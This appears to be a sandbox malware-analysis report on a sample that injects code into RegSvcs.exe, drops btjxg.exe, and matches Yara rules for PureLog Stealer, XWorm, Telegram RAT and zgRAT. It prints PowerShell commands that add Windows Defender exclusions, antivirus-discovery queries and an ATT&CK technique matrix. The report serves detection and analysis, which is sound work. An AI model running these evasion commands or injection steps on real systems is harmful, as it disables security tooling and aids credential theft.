Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 140000000 value starts with: 4D5A

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe

Thread register set: target process: 348

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 140002000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 1400A0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 5B53DFA010	Jump to behavior

Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\btjxg.exe "C:\Users\user\AppData\Local\Temp\btjxg.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'	Jump to behavior

Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Queries volume information: C:\Users\user\Desktop\9NBx4Vmiuj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Queries volume information: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\btjxg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Queries volume information: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: btjxg.exe, 00000004.00000002.3366251779.0000000001312000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: btjxg.exe PID: 1784, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: btjxg.exe PID: 1784, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\btjxg.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: btjxg.exe PID: 1784, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: btjxg.exe PID: 1784, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\btjxg.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	312 Process Injection	2 Obfuscated Files or Information	LSASS Memory	124 System Information Discovery	Remote Desktop Protocol	1 Clipboard Data	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	2 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	12 Software Packing	Security Account Manager	331 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
